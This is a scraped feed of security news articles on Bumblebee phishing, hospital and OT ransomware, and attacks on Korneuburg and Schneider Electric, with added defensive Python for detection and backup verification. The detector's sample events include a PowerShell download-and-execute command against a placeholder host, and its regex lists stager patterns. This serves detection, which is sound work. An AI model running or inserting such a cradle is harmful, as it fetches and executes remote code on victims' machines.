<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/">https://therecord.media/healthcare-industry-needs-relief-after-change-cyber-incident-hospital-association/</a></p></div>Don’t get stung by the Bumblebeehttps://redskyalliance.org/xindustry/don-t-get-stung-by-the-bumblebee2024-02-28T17:00:00.000Z2024-02-28T17:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12389946898,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12389946898,RESIZE_400x{{/staticFileLink}}" width="250" alt="12389946898?profile=RESIZE_400x" /></a>The infamous malware loader and initial access broker known as Bumblebee has resurfaced after a four-month absence as part of a new phishing campaign observed in February 2024. The enterprise security firm Proofpoint reported that the activity targets organizations in the US with voicemail-themed lures containing links to OneDrive URLs. "The URLs led to a Word file with names such as 'ReleaseEvans#96.docm' (the digits before the file extension varied)," the company said in a recent report. "The Word document spoofed the consumer electronics company Humane." Opening the document leverages VBA macros to launch a PowerShell command to download and execute another PowerShell script from a remote server that, in turn, retrieves and runs the Bumblebee loader.<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/new-all-in-one-evilextractor-stealer">https://redskyalliance.org/xindustry/new-all-in-one-evilextractor-stealer</a></p>
<p>Bumblebee, first reported in March 2022, is mainly designed to download and execute follow-on payloads such as ransomware. It has been put to use by multiple crimeware threat actors that were previously observed delivering BazaLoader (aka BazarLoader) and IcedID. It is also suspected to have been developed by threat actors within the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader. In September 2023, Intel 471 disclosed a Bumblebee distribution campaign that employed Web Distributed Authoring and Versioning (WebDAV) servers to disseminate the loader.</p>
<p>The attack chain is notable for its reliance on macro-enabled documents, especially considering that Microsoft began blocking macros in Office files downloaded from the internet by default in July 2022, prompting threat actors to modify and diversify their approaches. The macro-based attack also differs markedly from pre-hiatus campaigns, in which the phishing emails came with zipped LNK files bearing Bumblebee executables or HTML attachments that leveraged HTML smuggling to drop a RAR file, which exploited the WinRAR flaw tracked as CVE-2023-38831 to install the loader.</p>
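<p>The macro-to-PowerShell chain described above leaves a clear footprint in endpoint process-creation telemetry, which is where most defenders catch it regardless of how the document was delivered. What follows is an added example, not code from the article or from Proofpoint: a small Python checker that flags an Office application spawning a scripting host, raising the severity when the child's command line carries download or decode arguments. The event field names (Host, ProcessId, ParentImage, Image, CommandLine) follow the usual Sysmon Event ID 1 shape, and the four events are constructed for illustration.</p>

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Parents that should rarely, if ever, launch a scripting host on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that suggest the child is fetching or decoding a second stage.
STAGER_HINTS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer"
    r"|-enc(odedcommand)?\b|frombase64string",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    host: str
    pid: int
    severity: str
    reason: str


def _basename(image: str) -> str:
    """Normalise a Windows image path to its lower-case file name."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event: dict) -> Optional[Finding]:
    """Return a Finding for an Office -> script-host spawn, else None."""
    parent = _basename(event.get("ParentImage", ""))
    child = _basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    if STAGER_HINTS.search(event.get("CommandLine", "")):
        return Finding(event["Host"], event["ProcessId"], "high",
                       f"{parent} spawned {child} with download/decode arguments")
    return Finding(event["Host"], event["ProcessId"], "medium",
                   f"{parent} spawned {child}")


def scan(events: Iterable[dict]) -> List[Finding]:
    """Run assess() over a batch of events and keep only the hits."""
    return [f for f in (assess(e) for e in events) if f is not None]


# Constructed sample telemetry (not real captures); hostnames and URLs are placeholders.
SAMPLE_EVENTS = [
    {"Host": "ws-0417", "ProcessId": 5120,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage2.ps1')\""},
    {"Host": "ws-0417", "ProcessId": 5188,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
    {"Host": "ws-0231", "ProcessId": 7712,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Invoke-WebRequest http://example.invalid/tools.zip"},
    {"Host": "ws-0417", "ProcessId": 5201,
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.host} pid={finding.pid}: {finding.reason}")
```

<p>Only the first two events fire: the explorer.exe launch is left to other rules because the parent is not an Office process, and the print-spooler helper is ignored because it is not a scripting host. The medium-severity hit for a bare Get-Date is deliberate: on a fleet where macros are blocked by policy, any Office-spawned PowerShell is worth a look, and the command-line hints only decide how loudly to page.</p>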
<p>The return of Bumblebee also coincides with the reappearance of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed in the form of Microsoft Software Installer (MSI) files. The MSI drops a Windows .cab (Cabinet) archive containing a DLL, extracts the DLL from the .cab, and executes it using shellcode. The shellcode causes the DLL to spawn a second copy of itself and inject the bot code into the second instance's memory space.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/qakbot-malware-returns">https://redskyalliance.org/xindustry/qakbot-malware-returns</a></p>
<p>The latest QakBot artifacts have been found to harden the encryption used to conceal strings and other information, including employing a crypto-malware called DaveCrypter, making it more challenging to analyze. The new generation also reinstates the ability to detect whether the malware runs inside a virtual machine or sandbox.</p>
<p>Another crucial modification includes encrypting all communications between the malware and the command-and-control (C2) server using AES-256, a more robust method than was used in versions before the dismantling of QakBot's infrastructure in late August 2023. The takedown of the QakBot botnet infrastructure was a victory. Still, the bot's creators remain free, and someone with access to QakBot's source code has been experimenting with new builds and testing the waters with these latest variants. One of the most notable changes involves a change to the encryption algorithm the bot uses to conceal default configurations hardcoded into the bot, making it more difficult for analysts to see how the malware operates; the attackers are also restoring previously deprecated features, such as Virtual Machine (VM) awareness, and testing them out in these new versions.</p>
<p>QakBot has also emerged as the second most prevalent malware for January 2024, trailing behind FakeUpdates (aka SocGholish) but ahead of other families like Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.</p>
<p>The development comes as investigators reported a new campaign in which phishing sites mimicking financial institutions like Barclays trick potential targets into downloading legitimate remote desktop software like AnyDesk, purportedly to resolve non-existent issues, and ultimately allow threat actors to gain control of the machine.</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2024/02/bumblebee-malware-returns-with-new.html">https://thehackernews.com/2024/02/bumblebee-malware-returns-with-new.html</a></p></div>Cyber-Attacks on Hospitalshttps://redskyalliance.org/xindustry/cyber-attacks-on-hospitals2024-02-26T17:00:00.000Z2024-02-26T17:00:00.000ZJim McKeehttps://redskyalliance.org/members/JimMcKee<div><p><a href="{{#staticFileLink}}12389945471,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12389945471,RESIZE_400x{{/staticFileLink}}" width="250" alt="12389945471?profile=RESIZE_400x" /></a>Cybersecurity experts are warning that hospitals around the country are at risk for attacks like the one that is crippling operations at a premier Midwestern children’s hospital and that the US government is doing too little to prevent such breaches. Hospitals in recent years have shifted their use of online technology to support everything from telehealth to medical devices to patient records. Today, they are a favorite target for internet thieves who hold systems’ data and networks hostage for hefty ransoms, said John Riggi, the American Hospital Association’s cybersecurity adviser. “Unfortunately, the unintended consequence of using all this network- and internet-connected technology is that it expanded our digital attack surface,” Riggi said. “So, many more opportunities for bad guys to penetrate our networks.”<a href="#_ftn1">[1]</a></p>
<p>See: <a href="https://redskyalliance.org/xindustry/hive-hospitals">https://redskyalliance.org/xindustry/hive-hospitals</a></p>
<p>The assailants often operate from countries adversarial to the United States, such as Russia, North Korea, and Iran, where they enjoy big payouts from their victims and face little prospect of ever being punished. In November 2023, a ransomware attack on a healthcare chain that operates 30 hospitals and 200 health facilities in the United States forced doctors to divert patients from emergency rooms and postpone elective surgeries. Meanwhile, a rural Illinois hospital announced it was permanently closed last year because it could not recover financially from a cyberattack. The hackers went as far as posting photos and patient information of breast cancer patients who were receiving treatment at a Pennsylvania health network after the system was hacked last year.</p>
<p>Recently, one of the top children’s hospitals in the country, the Ann &amp; Robert H. Lurie Children’s Hospital of Chicago, has been forced to put its phone, email, and medical record systems offline as it battles a cyberattack. The FBI has said it is investigating. Brett Callow, an analyst for the cybersecurity firm Emsisoft, counted 46 cyberattacks on hospitals last year, compared with 25 in 2022. The paydays for criminals have gotten bigger, too, with the average payout jumping from $5,000 in 2018 to $1.5 million last year. “Unless governments do something more meaningful, more significant than they have done to date, it’ll inevitably get worse,” Callow said.</p>
<p>Callow believes the government should ban cyberattack victims such as hospitals, local governments and schools from paying ransoms. “There’s so much money being paid into the ransomware system now there’s no way the problem is going to go away on itself simply,” he said. The dramatic increase in these online raids has prompted the nation’s top health agency to develop new rules for hospitals to protect themselves from cyber threats.</p>
<p>The Department of Health and Human Services said it will rewrite the rules for the Health Insurance Portability and Accountability Act, the federal law commonly called HIPAA that requires insurers and health systems to protect patient information, to include new provisions that address cybersecurity later this year. The department is also considering new cybersecurity requirements attached to hospitals’ Medicaid and Medicare funding.</p>
<p>Most hospitals will struggle to protect themselves. Experts are worried about rural hospitals, for example, that may have difficulty cobbling together money to update their cybersecurity properly. HHS wants more money from Congress to tackle the issue, but Palm said the agency doesn’t have a precise dollar amount it seeks. Becoming the victim of a cyberattack is costly, too. The attacks can put hospitals’ networks offline for weeks or months, forcing hospitals to turn away patients.</p>
<p>In Chicago, Lurie Hospital’s network has been offline for two weeks. The hospital, which served more than 260,000 patients last year, has established a separate call center for patients’ needs and resumed some care. </p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com </p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p><strong>Weekly Cyber Intelligence Briefings:</strong></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.securityweek.com/cyberattacks-on-hospitals-are-likely-to-increase-putting-lives-at-risk-experts-warn/">https://www.securityweek.com/cyberattacks-on-hospitals-are-likely-to-increase-putting-lives-at-risk-experts-warn/</a></p></div>IT / OT Issueshttps://redskyalliance.org/xindustry/it-ot-issues2024-02-13T17:05:00.000Z2024-02-13T17:05:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12377954654,RESIZE_400x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12377954654,RESIZE_400x{{/staticFileLink}}" width="250" alt="12377954654?profile=RESIZE_400x" /></a>The Colonial Pipeline ransomware infection has become a cautionary story about how ‘borking’ critical infrastructure can cause real-world pain, with fuel shortages leading to long lines and fistfights breaking out at gas stations. Or as Jen Easterly, boss of the US Cybersecurity and Infrastructure Security Agency, warned Congress recently, "Societal panic and chaos."</p>
<p>The CISA Director and other security and law enforcement chiefs stressed the reality in which nation-states operating against American infrastructure could cause physical havoc and destruction, particularly in the field of industrial operational technology systems.<a href="#_ftn1">[1]</a></p>
<p>The Colonial Pipeline ransomware attack targeted the oil distributor's backend IT systems. To date, such infections against fuel and internet providers, banks, hospitals and other critical sectors that keep life running have only targeted business networks. Some security analysts worry that ransomware designed to shut down operational technology systems and processes, such as those used in power plants, water treatment facilities, and manufacturing plants, is the next big thing. Fortunately, there's still plenty of money to be made from traditional ransomware infections, and infosec experts say this should keep the criminals busy, at least for the time being.</p>
<p>"Dragos assesses with low confidence that ransomware groups may increasingly develop and deploy ransomware specifically designed to disrupt operational technology (OT) processes," the OT security shop warned in its most recent quarterly ransomware analysis. "Such disruptions would not only affect operational capabilities but also compromise safety, thereby increasing the urgency and potentially compelling victims to meet ransom demands more readily," the report noted.</p>
<p>Dragos regularly responds to ransomware infections in industrial environments. And this assessment, albeit one with "low confidence," stems from criminals' increasingly vile extortion tactics designed to increase the pressure on victim organizations to pay ransom demands, according to a senior adversary hunter at Dragos. "Look at the methods of extortion, the way they create a significant impact on the victims," he said. "It's been increasing for the last two years, especially for industrial organizations." Plus, he added, as governments step up their efforts to dismantle ransomware gangs and prosecute their members, the criminal groups adopt new techniques to increase pressure on victims to pay up. "We have seen in the past groups that added to their arsenal the ability to kill OT processes," he emphasized.</p>
<p>The code he was referring to is EKANS, a ransomware variant with capabilities including forcibly stopping some industrial control system (ICS) operations. "While all indications at present show a relatively primitive attack mechanism on control system networks, the specificity of processes listed in a static 'kill list' shows a level of intentionality previously absent from ransomware targeting the industrial space," the security shop warned in 2020. Dragos explained that it hasn't yet been deployed in a cyber attack, but the capabilities for serious mischief do exist. "Extortion has gone beyond financial loss to safety," it warned. "We have seen ransomware groups announce their alignment with different regimes. Imagine what would happen if this was used as a weapon."</p>
<p>The threat isn't only coming from nation-state attackers, however. While a destructive attack from Russia or China that shut down the energy grid or water facilities would likely be considered an act of war, criminal gangs could give adversarial governments plausible deniability once financially motivated groups like LockBit or BlackCat/ALPHV can buy these capabilities.</p>
<p>Dragos’ CEO expects to see OT-specific ransomware become much more commonplace. "Criminal actors no longer needed to develop their own capabilities, malicious software vulnerabilities, etc.," he explained. "They literally buy off-the-shelf tools that are commonly used, and then just worry about operating them."</p>
<p>This hasn't happened yet, according to CISA. "You could draw parallels with PLCs being taken down," CISA's Industrial Control Systems cybersecurity lead said recently. Last December, CISA, along with the FBI, the US National Security Agency and others, warned that Iran-linked cyber thugs had exploited Israeli-made programmable logic controllers (PLCs) used in "multiple" water systems and other operational technology environments at facilities across the US. "Was it ransomware? No. The device was effectively reflashed and all the code was stripped off of it," he explained, noting that these incidents did produce a similar impact on the OT systems, although with an easier recovery for defenders. "The ransomware business model is buying and sharing tools," he added. "Developing abilities that specifically infect OT systems cost money, and they are already making money hand over fist, so why bother?"</p>
<p>Of course, shutting down industrial controls would be "very bad" and prompt a "much more voracious" response from law enforcement. "If you can't handle the traditional IT ransomware, you're certainly not going to be able to handle OT ransomware recovery," he confirmed.</p>
<p>OT configurations, as well as backup and recovery for these systems and processes, are more complex than standard business IT environments. A lot of the time, critical infrastructure owners and operators contract directly with the OT and ICS vendors to handle updates and operations.</p>
<p>CISA recommends industrial orgs follow best practices and employ prevention measures for traditional ransomware. But then there's also OT-specific advice: like backing up OT configurations and ladder logic. "Organizations need to be a lot better about actually being able to recover from an attack," experts observed. "That's like the biggest deal with ransomware right now. It's true for IT. It's certainly true for OT, and then the impact of critical infrastructure going down just as far, far worse."</p>
<p>It typically takes victim companies at least five months to recover from an infection, he reported. "That's not going to be acceptable for critical infrastructure."</p>
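<p>CISA's advice to back up OT configurations and ladder logic only helps if the backup is still intact when it is needed, and the backup host is exactly what a ransomware crew goes after first. What follows is an added example, not tooling from CISA, Dragos or the article: a Python script that builds a SHA-256 manifest of a backup tree (PLC project exports, tag databases, HMI configuration) and later compares the tree against a trusted copy of that manifest, reporting modified, missing and unexpected files before anyone relies on the backup for recovery. The directory layout and file contents in run_demo() are constructed; in practice the trusted manifest lives off the backup host, in a write-once or otherwise read-only location, so a tampered backup cannot rewrite its own checksums.</p>

```python
import hashlib
import json
import tempfile
from pathlib import Path
from typing import Dict, List

MANIFEST_NAME = "manifest.sha256.json"


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large project exports do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(backup_dir: Path) -> Dict[str, str]:
    """Map each file (relative POSIX path) under backup_dir to its SHA-256; the manifest itself is skipped."""
    manifest: Dict[str, str] = {}
    for path in sorted(backup_dir.rglob("*")):
        if path.is_file() and path.name != MANIFEST_NAME:
            manifest[path.relative_to(backup_dir).as_posix()] = sha256_file(path)
    return manifest


def write_manifest(backup_dir: Path) -> Dict[str, str]:
    """Record the current state of the backup tree; keep a copy of the result somewhere the backup host cannot alter."""
    manifest = build_manifest(backup_dir)
    (backup_dir / MANIFEST_NAME).write_text(json.dumps(manifest, indent=2, sort_keys=True))
    return manifest


def verify_backup(backup_dir: Path, trusted_manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the live tree against a trusted manifest and classify every difference."""
    current = build_manifest(backup_dir)
    return {
        "modified": sorted(p for p in trusted_manifest if p in current and current[p] != trusted_manifest[p]),
        "missing": sorted(p for p in trusted_manifest if p not in current),
        "unexpected": sorted(p for p in current if p not in trusted_manifest),
    }


def is_restorable(report: Dict[str, List[str]]) -> bool:
    """A backup is safe to restore from only if nothing it promised has changed or vanished."""
    return not report["modified"] and not report["missing"]


def run_demo() -> Dict[str, List[str]]:
    """Constructed scenario: snapshot a small backup tree, then simulate tampering, deletion and a stray file."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = Path(tmp)
        (backup / "plc01").mkdir()
        (backup / "plc01" / "main_ladder.l5x").write_text("constructed ladder-logic export, revision 12\n")
        (backup / "plc01" / "tags.csv").write_text("TagName,DataType\nPump1_Run,BOOL\n")
        (backup / "hmi").mkdir()
        (backup / "hmi" / "station.cfg").write_text("screen=overview\n")
        trusted = write_manifest(backup)          # the copy an operator would keep off-host
        # Events between snapshot and restore attempt:
        (backup / "plc01" / "main_ladder.l5x").write_text("constructed ladder-logic export, altered\n")
        (backup / "hmi" / "station.cfg").unlink()
        (backup / "plc01" / "notes.txt").write_text("left behind\n")
        return verify_backup(backup, trusted)


if __name__ == "__main__":
    report = run_demo()
    print(json.dumps(report, indent=2))
    print("restorable:", is_restorable(report))
```

<p>Run on a schedule, the comparison also answers the "five months to recover" problem in a cheaper way than a full restore drill: a modified or missing PLC export is found the day it happens, not the day the plant is down. Unexpected files are reported but do not block a restore, since they are usually an operator's scratch copy rather than a sign the backup was altered.</p>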
<p>OT and IoT security firm Armis, in its 2023 attack landscape analysis, reported a 104% year-over-year increase in attempted intrusions across the board, while utility-specific attempts over this same time period grew by 200 percent. This increase represents attack attempts targeting any physical and virtual assets within utilities' environments, including IT, IoT, OT, ICS, building management systems and others, Carlos Buenaño, Armis CTO of OT, explained.</p>
<p>Buenaño experienced this firsthand while working for an energy biz. "In a window of five minutes, I could actually see our demilitarized zone trying to be accessed, and using brute force to get into the OT environment," he said. Armis identified engineering workstations, SCADA servers and PLCs as the riskiest OT and ICS devices outside of the healthcare industry. The 12-month analysis named engineering workstations as the year's most targeted OT device. "The fact is: we need to be prepared, because just the fact that we haven't seen successful ransomware attacks against OT doesn't mean that they haven't been attempted," he warned.</p>
<p>However, securing OT presents its own unique challenges. These environments can't be taken down for frequent maintenance, which means that vulnerabilities remain exposed for extended periods between scheduled outages. "The attackers know the vulnerabilities, they know that these devices are critical and very, very difficult to protect for so many reasons," Buenaño explained. "They are designed to continue running and finding that shutdown window to remediate, update firmware or even replace them when they are end-of-life can be very complex and require a lot of scheduling and strategy."</p>
<p>There's also the issue of OT devices being exposed to the internet. Armis found over the last year that about 80% of engineering workstations and 60 percent of SCADA servers had internet access, increasing organizations' attack surface and risk. Plus, many industrial control devices come with default passwords that operators never change, and some don't even support multifactor authentication.</p>
<p>All of these issues came into play in the case of the Iranian crew breaking into US-based water facilities. They likely broke in by using default passwords for internet-accessible PLCs. And in at least one case, the cyber-attack forced a Pennsylvania water authority to switch a pumping station to manual control.</p>
<p>The solution relies on a two-pronged approach. "In some places the solution will be in resiliency, meaning the ability to replace the devices," said an IT/OT expert. This could mean a hot redundant system, meaning multiple units performing the same function, or a cold redundant system, where one is fired up if the master system fails. "This needs to be done based on analysis of the importance of the devices and the impact of having them shut down," he explained.</p>
<p>In addition to resiliency, there's also the need to protect the devices themselves better, and ensure authentication and access controls are all enabled. "Currently the level of security is usually a very simple username and password, if at all," he said. "They are not using, in most cases, multifactor authentication. And in many cases you also have the same access being used for the vendor as well as for some third-party maintenance."</p>
<p>Limited access and stricter authentication methods aren't frequently used "because it's much easier to work without those," he added. "The concern is that if you put too many of these security measures in place, it might actually interfere with your operations." And therein lies the rub: critical infrastructure is all about uptime and availability and security, fairly or not, is seen as the enemy of availability. "A lot of these organizations are still prioritizing availability over actual cyber security," explained an offensive cyber security research evangelist at CyberArk. "So even though there may be free and available guidance, they're not adhering to it, because it has potential availability ramifications if done incorrectly." Plus, there's also a massive budget and skills gap between critical infrastructure sectors and organizations within the same industry. "Critical infrastructure of water treatment varies from very large metropolitan organizations, all the way down to small municipalities," CyberArk said. "Smaller municipal water treatment facilities, due to so many things like limited budgets, outdated infrastructure, limited expertise within these organizations, are target-rich, resource-poor organizations that make for fantastic targets of opportunistic ransomware attackers."</p>
<p>CyberArk pointed to CISA's resources for securing water systems (similar resources are available for other critical infrastructure sectors in the US) and noted that many of the government's recommendations come down to basic security hygiene: using strong, unique passwords, turning on multifactor authentication where possible, segmenting networks, and air-gapping critical systems. "If this is critical infrastructure, protect it like it's critical infrastructure," he declared. "This is a standard operating procedure in IT environments, and it should be extended into OT as well."</p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. Call for assistance. For questions, comments, a demo or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<p>Reporting: <a href="https://www.redskyalliance.org/">https://www.redskyalliance.org/</a></p>
<p>Website: <a href="https://www.redskyalliance.com/">https://www.redskyalliance.com/</a></p>
<p>LinkedIn: <a href="https://www.linkedin.com/company/64265941">https://www.linkedin.com/company/64265941</a></p>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5993554863383553632">https://attendee.gotowebinar.com/register/5993554863383553632</a></p>
<p><a href="#_ftnref1">[1]</a> <a href="https://www.msn.com/en-us/news/technology/is-critical-infrastructure-prepared-for-ot-ransomware/ar-BB1hFPsp">https://www.msn.com/en-us/news/technology/is-critical-infrastructure-prepared-for-ot-ransomware/ar-BB1hFPsp</a></p></div>Funerals in Austria Canceled by Hackershttps://redskyalliance.org/xindustry/funerals-in-austria-canceled-by-hackers2024-02-12T12:55:00.000Z2024-02-12T12:55:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p>Is nothing sacred? Criminal hackers have reached a new low. The Municipality of Korneuburg in Austria said it was hit by a ransomware attack, leading to funerals reportedly being canceled and the town hall informing residents its staff can only be reached via telephone. The small town on the banks of the Danube a few kilometers north of Vienna has a population of under 13,000 people. In a statement on the municipality’s website, the town hall said its technical department was “working hard to resolve the problem” and guarantee the security of the authority’s data. According to media reports, the ransomware attack has affected all of the data held by the administration, including the backup system. Officials have confirmed receiving an extortion demand.</p>
<p>The local Austrian newspaper Mein Bezirk quoted the council’s deputy mayor Helene Fuchs-Moser saying: “Everything is dead, we can’t even print out registration forms or death certificates or transfer bills.” Noen, another local paper, reported that funerals have been canceled because of the inability to issue death certificates. Most countries require funeral directors to receive a certificate before burying or cremating the deceased.</p>
<p>The town hall's IT manager, Christopher Kremlicka, discovered the attack last week on the night of 2 February. “I suddenly received an email saying that something was happening in our data area that shouldn't be happening. Of course, I checked it immediately and noticed that everything was encrypted,” said Kremlicka.</p>
<p>Officials said they had reported the incident and extortion attempt to the police.</p>
<p>Fuchs-Moser, who according to Noen is leading on the issue while the mayor is on vacation, said the administration would not be making an extortion payment. Fuchs-Moser said that the IT team had signed off on the security of the town hall’s systems as recently as December. “We were certified that everything was safe. Unfortunately, the criminals are always one step further.”</p>
<p>Source: <a href="https://therecord.media/funerals-canceled-due-to-ransomware-attack-on-austrian-town?utm_medium=email&_hsmi=293365176&_hsenc=p2ANqtz-996T2KIJTyI_0LcGTZIAMU7qovPhQm3UfVONEyrdAFD08_qlrNzLxVpZRgZg72gNrZHy_kWh4ZIAPvfWQnnfUfq1VVHyE35a4kpo9ueb6LHgqddT8&utm_content=293369973&utm_source=hs_email">Funerals reportedly canceled due to ransomware attack on Austrian town (therecord.media)</a></p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p>
</div>Cactus Ransomware in Francehttps://redskyalliance.org/xindustry/cactus-ransomware-in-france2024-02-01T12:55:00.000Z2024-02-01T12:55:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12369303100,RESIZE_710x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12369303100,RESIZE_400x{{/staticFileLink}}" width="250" alt="12369303100?profile=RESIZE_400x" /></a>French multinational Schneider Electric is reporting that its Sustainability Business division suffered a ransomware attack earlier this month. In a statement this week, the company confirmed the incident and said the attack affected its Resource Advisor product, a data visualization tool for sustainability information, as well as other “division specific systems.”</p>
<p>Schneider Electric said that data was accessed by the hackers.<a href="#_ftn1">[1]</a> Bleeping Computer, which first reported the incident, said the Cactus ransomware gang is behind the attack. “Schneider Electric Global Incident Response team has been immediately mobilized to respond to the attack, contain the incident, and to reinforce existing security measures. The Sustainability Business division has informed impacted customers,” the company said. “From a recovery standpoint, Sustainability Business is performing remediation steps to ensure that business platforms will be restored to a secure environment. Teams are currently testing the operational capabilities of impacted systems with the expectation that access will resume in the next two business days.”</p>
<p>The company noted that Sustainability Business is an autonomous entity operating on an isolated network infrastructure and no other Schneider Electric divisions were affected. Cybersecurity firms have been hired to investigate the incident.</p>
<p>Schneider Electric, which reported a revenue of more than $37 billion in 2022, did not respond to requests for comment about whether the Cactus ransomware group was responsible for the attack, which took place on 17 January.</p>
<p>Microsoft warned of the Cactus ransomware in December 2023, explaining that the group was using online advertisements to infect victims. Incident response firm Dragos also said it is increasingly seeing Cactus ransomware used in attacks on industrial organizations, impacting manufacturing and ICS equipment and engineering sectors.</p>
<p>The group emerged in March 2023 but “appears to be run by skilled, experienced hackers,” ransomware expert Allan Liska told Recorded Future News in December. The gang took credit for an attack on Coop, one of Sweden's largest supermarket chains, around New Year's.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/cactus-attacks-coop-foods">https://redskyalliance.org/xindustry/cactus-attacks-coop-foods</a></p>
<p>Schneider Electric dealt with data theft by a ransomware gang last year, when the Clop ransomware group stole information from the company using a vulnerability in popular file transfer tool MOVEit.</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://therecord.media/schneider-electric-ransomware-attack-sustainability-division/">https://therecord.media/schneider-electric-ransomware-attack-sustainability-division/</a></p></div>Albabat Ransomwarehttps://redskyalliance.org/xindustry/albabat-ransomware2024-01-30T17:10:00.000Z2024-01-30T17:10:00.000ZBill Schenkelberghttps://redskyalliance.org/members/BillSchenkelberg<div><p><a href="{{#staticFileLink}}12368052452,RESIZE_584x{{/staticFileLink}}"><img class="align-left" src="{{#staticFileLink}}12368052452,RESIZE_400x{{/staticFileLink}}" width="250" alt="12368052452?profile=RESIZE_400x" /></a>Albabat, also known as White Bat, is a financially motivated ransomware variant written in Rust that identifies and encrypts files important to the user and demands a ransom to release them. It first appeared in November 2023 with the variant Version 0.1.0. Version 0.3.0 was released in late December, followed by version 0.3.3 in mid-January 2024.</p>
